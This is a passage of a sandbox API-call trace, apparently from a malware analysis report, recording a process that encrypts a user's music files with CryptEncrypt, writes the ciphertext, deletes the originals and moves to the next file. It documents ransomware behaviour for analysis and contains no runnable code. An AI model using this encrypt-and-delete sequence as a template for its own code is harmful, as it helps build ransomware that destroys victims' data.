hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0111.978] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0111.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0111.978] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.979] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xfc5a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xfc60) returned 1 [0111.979] CharLowerBuffW (in: lpsz="byte[64609]", cchLength=0xb | out: lpsz="byte[64609]") returned 0xb [0111.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0111.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caad8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0111.980] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0xfc5a, dwBufLen=0xfc60 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0xfc60) returned 1 [0111.980] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.980] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.980] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.980] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xfc60, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xfc60, lpOverlapped=0x0) returned 1 [0111.982] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0111.982] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0111.982] CryptDestroyKey (hKey=0x41ac600) returned 1 [0111.982] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.982] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.983] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0111.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0111.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.983] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0111.983] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0111.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.983] FreeLibrary (hLibModule=0x756e0000) returned 1 [0111.983] CloseHandle (hObject=0x258) returned 1 [0111.983] CloseHandle (hObject=0x298) returned 1 [0111.985] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3", lpFilePart=0x0) returned 0x36 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e310 [0111.986] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\d4swwmt- hf4jge2.mp3")) returned 0x20 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0111.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0111.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa25e60, ftCreationTime.dwHighDateTime=0x1d5ef94, ftLastAccessTime.dwLowDateTime=0xaaabc190, ftLastAccessTime.dwHighDateTime=0x1d5e676, ftLastWriteTime.dwLowDateTime=0xaaabc190, ftLastWriteTime.dwHighDateTime=0x1d5e676, nFileSizeHigh=0x0, nFileSizeLow=0xfc5a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="D4sWWmt- Hf4jGE2.mp3", cAlternateFileName="D4SWWM~1.MP3")) returned 0x41ac500 [0111.986] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\D4sWWmt- Hf4jGE2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\d4swwmt- hf4jge2.mp3")) returned 1 [0112.094] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa25e60, ftCreationTime.dwHighDateTime=0x1d5ef94, ftLastAccessTime.dwLowDateTime=0xaaabc190, ftLastAccessTime.dwHighDateTime=0x1d5e676, ftLastWriteTime.dwLowDateTime=0xaaabc190, ftLastWriteTime.dwHighDateTime=0x1d5e676, nFileSizeHigh=0x0, nFileSizeLow=0xfc5a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="D4sWWmt- Hf4jGE2.mp3", cAlternateFileName="D4SWWM~1.MP3")) returned 0 [0112.094] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e310 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0112.094] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0112.094] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0112.141] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0112.141] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0112.141] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0112.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0112.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c68 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c68 | out: hHeap=0x1780000) returned 1 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fc8 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0112.142] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0112.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0112.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0112.143] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.143] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80dd97f0, ftCreationTime.dwHighDateTime=0x1d5ead4, ftLastAccessTime.dwLowDateTime=0x1883d600, ftLastAccessTime.dwHighDateTime=0x1d5e189, ftLastWriteTime.dwLowDateTime=0x1883d600, ftLastWriteTime.dwHighDateTime=0x1d5e189, nFileSizeHigh=0x0, nFileSizeLow=0x5975, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="dle rck7Umm-.wav", cAlternateFileName="DLERCK~1.WAV")) returned 0x41ac500 [0112.143] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0112.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0112.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0112.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0112.143] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0112.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0112.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0112.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0b8 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0112.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0112.144] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0112.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0112.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0112.144] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: 